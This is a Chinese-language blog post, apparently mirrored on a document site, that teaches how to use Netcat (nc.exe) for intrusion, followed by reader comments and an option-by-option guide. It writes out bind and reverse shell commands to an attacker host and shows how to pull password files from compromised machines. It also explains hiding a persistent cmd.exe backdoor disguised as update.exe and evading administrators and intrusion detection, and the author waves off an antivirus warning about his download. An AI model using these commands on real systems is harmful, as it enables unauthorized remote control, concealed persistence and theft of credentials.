1、瑞士军刀NC下载与使用教程瑞士军刀NC下载与使用教程nc.exe全称NetCat,被誉为网络安全界的”瑞士军刀”.nc.exe是一个非常标准的telnet客户端工具,正因为它的强大功能使得它在入侵时被广泛应用,成为黑客们的必备武器之一.我把最近收集的nc.exe的使用方法整理了一下,发给大家.另外还找到了一款改编后的可视化的nc,也提供给大家.=软件介绍:工具名:Netcat作者:Hobbit&ChrisWysopal类别:开放源码平台:Linux/BSD/Unix/WindowsWINDOWS下版本号:v1.10NT=参数介绍:*nc.exe-h*即可看到各参数的使用方法。基本格式:nc-o
2、ptionshostnameportsportsnc-l-pportoptionshostnameport-d后台模式-eprog程序重定向,一旦连接,就执行危险!-ggatewaysource-routinghoppoints,upto8-Gnumsource-routingpointer:4,8,12,-h帮助信息-isecs延时的间隔-l监听模式,用于入站连接-L连接关闭后,仍然继续监听-n指定数字的IP地址,不能用hostname-ofile记录16进制的传输-pport本地端口号-r随机本地及远程端口-saddr本地源地址-t使用TELNET交互方式-uUDP模式-v详细输出用两个-
3、v可得到更详细的内容-wsecstimeout的时间-z将输入输出关掉用于扫描时端口的表示方法可写为M-N的范围格式。=基本用法:1)连接到REMOTE主机,例子:格式:nc-nvv192.168.x.x80讲解:连到192.168.x.x的TCP80端口2)监听LOCAL主机,例子:格式:nc-l-p80讲解:监听本机的TCP80端口3)扫描远程主机,例子:格式:nc-nvv-w2-z192.168.x.x80-445讲解:扫描192.168.x.x的TCP80到TCP445的所有端口4)REMOTE主机绑定SHELL,例子:格式:nc-l-p5354-t-ec:winntsystem32c
4、md.exe讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口5)REMOTE主机绑定SHELL并反向连接,例子:格式:nc-t-ec:winntsystem32cmd.exe192.168.x.x5354讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令”|”与重定向命令”等等命令功能更强大)。=高级用法:6)作攻击程序用,例子:格式1:type.exec:exploit.txt|nc-nvv192.168.x.x80格式2:nc-nvv192.168
5、.x.x80c:log.txt讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*改为*即可以追加日志附:*c:log.txt*为日志等9)作蜜罐用3,例子:格式1:nc-L-p80c:honeypot.txt格式2:type.exec:honeypot.txt|nc-L-p80讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中10)后门victim machine: /受害者的机器nc -l -p port -e cmd /win2000nc -l -p
6、port -e /bin/sh /unix,linuxattacker machine: /攻击者的机器.nc ip -p port /连接victim_IP,然后得到一个shell。11)反向连接attacker machine: /一般是sql2,远程溢出,webdavx3攻击./或者wollf的反向连接.nc -vv -l -p portvictim machine:nc -e cmd attacker ip -p portnc -e /bin/sh attacker ip -p port或者:attacker machine:nc -vv -l -p port1 /*用于输入*/nc
7、-vv -l -p prot2 /*用于显示*/victim machine:nc attacker_ip port1 cmd nc attacker_ip port2nc attacker_ip port1 /bin/sh nc attacker_ip port2139要加参数-s(nc -L -p 139 -d -e cmd -s 对方机器IP)这样就可以保证nc优先于NETBIOS。12)传送文件:从肉鸡拖密码文件回来.nc -d -l -p port pathfile.txt /*victim machine*/ 需要Ctrl+C退出/肉鸡需要gui界面的cmd里面执行(终端登陆,不如
8、安装FTP方便).否则没有办法输入Crl+C.上传命令文件到肉鸡nc vv -l -p port pathfile.txt /*victim machine*/ 需要Ctrl+C退出nc -d victim_ip port pathfiledest /*attacker machine*/ 可以shell执行/这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.结论: 可以传输ascii,bin文件.可以传输程序文件.问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc .或者只有再次连接使用pskill 杀掉进程.但是是否释放传输文件打开的句柄了?13)端口数据抓
9、包.nc -vv -w 2 -o test.txt 80 21-15 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command “” unr 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized 00000084 83 00 00 01 8f # .14)telnet,自动批处理。nc victim_ip
10、port pathfile.cmd /*victim machine*/ 显示执行过程.nc -vv victim_ip port pathfile.cmd /*victim machine*/ 显示执行过程.nc -d victim_ip port pathfile.cmd 安静模式._file.cmd_passwordcd %windir%echo =%windir%c:cdmd testcd /d %windir%system32net stop sksockserversnake -config port 11111net start sksockserverexit附件:nc.exe
11、(59392 Byte)附件:mvnc.exe(188928 Byte)图片附件:Tags: nc, 下载, 瑞士军刀This entry was posted on Wednesday, February 7th, 2007 at 3:38 pm and is filed under 安全. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. 7 Responses to “瑞士军刀NC下载
12、与使用教程”1. abc Says: March 17th, 2007 at 2:04 pm nc you du ma ?2. maker Says: March 18th, 2007 at 5:30 am 晕倒,当然没有了,第一个是原版nc,第2个是被改造过的可视化nc.都是我自己用的东西.3. 柳琴 Says: March 25th, 2007 at 3:24 am 其实你很够朋友的当真,哈哈,谢谢你,王墨4. 请教 Says: March 26th, 2007 at 4:34 am nc监听一般要多久才能得到shell啊?我都等了两个小时了!.望指教5. maker Says: Apri
13、l 5th, 2007 at 1:10 pm 这个问题就很难回答了,如果没有连接,监听一年都是白费6. fdfd Says: September 6th, 2008 at 8:57 am 靠,刚点链接立马病毒报警7. maker Says: September 8th, 2008 at 10:07 am 不懂不要乱说,谁都知道nc多数是用来发动攻击的,杀毒软件当然也不傻.如果报警就是有病毒那估计这个世界上就没有人下木马了, 下灰鸽子安装包的时候也会报警.Leave a Reply窗体顶端Name (required)Mail (will not be published) (required)
14、Website窗体底端 Pageso 关于我 o 留言簿 o 联系我 Categorieso 代码 o 作品 o 其他 o 分享 o 安全 o 宣传 o 技术 o 日记 o 相册 o 笔记 Archiveso April 2010(1) o March 2010(4) o February 2010(1) o January 2010(2) o October 2009(1) o August 2009(1) o June 2009(2) o February 2009(1) o December 2008(1) o October 2008(3) o September 2008(3) o
15、August 2008(5) o July 2008(1) o June 2008(1) o May 2008(2) o April 2008(5) o December 2007(2) o November 2007(3) o September 2007(8) o July 2007(2) o June 2007(13) o May 2007(5) o March 2007(2) o February 2007(14) o January 2007(9) o December 2006(10) o November 2006(4) o September 2006(1) o August
16、2006(1) o July 2006(2) Blogrollo 4s symfony blog o 积木之城 Contributorso 积木之城 Metao Register o Log in o Entries RSS o Comments RSS o WordPress.org (c) 2008 by Makers blog. Site powered by WordPress and designed by Azeem Azeez and Dave Rigotti. Entries (RSS) and Comments (RSS). 在入侵中它是最经典的工具之一 ,NetCat被所有
17、的网络安全爱好者和研究者称之为瑞士军刀,通过名字大家就能知道他的功能足够丰富。nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。NetCat没有图形界面,很粗糙,很原始。nc可以通过很多途径下载得到,unix和Winodws平台下的官方站点是:http:/nc的命令行nc的基本命令行形式是 nc options host ports,其中host是要扫描的主
18、机名或IP地址,ports要么是一个单独的端口,要么是一个端口范围(用m-n的形式指定),要么是一系列用空格隔开的单个端口。-d 只对Windows操作系统有用,该选项使NetCat以隐蔽模式工作,从而脱离MS-DOS命令提示符下环境运行,使得nc不需要保持打开命令窗口便可在监听模式下运行,也可以帮助黑客很好地隐藏监听NetCat实例而不被系统管理员发现。-e 如果NetCat使用gaping_security_hole选项进行编译,那么只要某人在NET后台所监听的任何端口上建立连接,该NetCat都将执行,且客户端的NetCat会通过管道将I/O传输到在别处监听的另一个NetCat实例中。使
19、用这个选项非常危险,除非你对nc相当了解,起码知道你自己在做什么。这是在系统中建立后门shell的一个非常快捷且容易的方法。-i 延时间隔,表示在两次数据发送之间nc等待的时间。例如:当经过管道传输一个文件到nc的时候,在传输输入的下一行之前,nc将等待的秒数。当使用nc对一台主机的多个端口之间进行操作时,在切换到下一个端口之前,nc等待的秒数。这样可以使黑客在进行数据传输或对一个服务进行攻击的时候更加隐蔽,也可以帮助你的端口扫描不被入侵检测系统和系统管理员发现。-g这个选项具有欺骗性。nc支持loose source routing(松散源路由)。你可以在命令行中指定多达8个-g选项来强迫n
20、c流量经过特定的IP地址,这在你为流量设置伪造的源IP地址时,可以利用这个方法达到通过防火墙的过滤器或者允许访问主机列表,希望接收到从主机返回的响应。-G该选项让用户在-g选项所指定的路由列表中指定的一个地址作为当前的下一路由,由于IP地址为4字节大小(IPV4),所以这个参数总是4字节的倍数;例如,4代表路由表中的第一个IP地址,8代表第二个IP地址,依次类推。这在伪造部分源路由表使得报文看起来相当的有用。在进行欺骗和源路由时,这个功能有助于屏蔽你的位置,但也不一定能接收到响应报文,因为响应报文将经过由伪造的IP地址反路由回来。-l 该选项切换nc的监听模式。此选项必须与-p选项一起使用以告
21、诉nc绑定某个指定的TCP端口并等待到来的连接。若换成-u选项,则应使用UDP端口而非TCP端口。-L 该选项在Windows版本中有用,当一个连接被关闭后,使用相同的命令行选项进行重启监听模式,即使此时初始的连接已经结束,nc也能在不需要用户干涉的情况下接收后面新的连接。与-l一样,必须与-p同时使用。-n 该选项告诉我们nc不做任何主机名查找的工作。-0对数据执行一次十六进制转储(hex dump )并将其存储在hexfile中。命令nc-o hexfile将把双向通信的数据记录下来,在每行的开始处会有一个“”用来分别指示是进入数据还是外出数据。如果只想得到对进入数据的十六进制转储,可以使
22、用 nc -ohexfile命令。-p 让用户指定一个nc应使用的本地端口号。当通过-l或-L选项来使用监听模式的时候,这个参数是必需的。如果没有为外出连接指定这个参数,则与大多数其他TCP或UDP客户程序的做法一样,nc将使用系统分配给他的任何端口。-r 该参数使nc可以随机选择本地和远程端口。当使用nc在系统中范围很大的一批端口上获取信息时,要想混合源端口和目标端口的顺序看起来不怎么象端口扫描,这个选项是很有用的。当这个选项与-i选项和一个足够大的间隔结合使用的时候,在不被注意的端口扫描成功几率能得到很大提升。-s 指定nc建立连接时所使用的IP地址,该选项允许黑客做一些工作,它允许黑客隐
23、藏他们的IP地址或假冒他人的IP地址,但是要得到路由到他们所欺骗的地址的任何信息,都需要使用-g源路由选项。其次,当处于监听模式时,大多数情况下都可以与一个已经监听的服务“预先绑定”,所有TCP和UDP服务都绑定到某个端口。-t 如果使用telnet选项编译,nc就可以与telnet服务器进行telnet选项协商,虽然它的响应是毫无意义的信息,但可以通过该状态看到连接23端口的信息。-u nc使用UDP而非TCP,在客户模式和监听模式下都起作用。-v 控制nc将要做的事情达到的程度,如使用nc -v,那么nc将仅吐出它所接收到的数据,一个单独的-v可以知道它连接或绑定的地址是否有问题发生,第2
24、个-v可以让nc在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。-w控制在一个连接上nc放弃之前等待的时间。同时也告诉nc当在标准输入上接收到一个eof(end-of-file)之后应该等待多长时间来关闭连接并退出。如果你通过nc向远程服务器发送命令并且期望大量的数据返回(例如:向一台web服务器发送一个http命令以下载一个大文件),该选项是很有用的。nc的具体使用c:nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。c:nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系
25、统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,c:move nc.exe c:windowssystem32Driversupdate.exec:windowssysteme32driversupdate.exe -p 4455 -d -L -e cmd.exe系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。c:windowssystme32driversupdate.execmd line: -l -p 4455 -d -L -e cmd.exec:nc -l - p 80 监听80端口nc
26、-l -p 80 c:log.dat 监听80端口,并把信息记录到log.dat中nc -v -l -p 80 监听80端口,并显示端口信息nc -vv -l -p 80 监听80端口,显示更详细的端口信息nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。nc -v ip port 扫瞄某IP的某个端口nc -v -z ip port-port扫描某IP的端口到某端口nc -v -z -u ip port-port扫描某IP的某UDP端口到某UDP端口
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1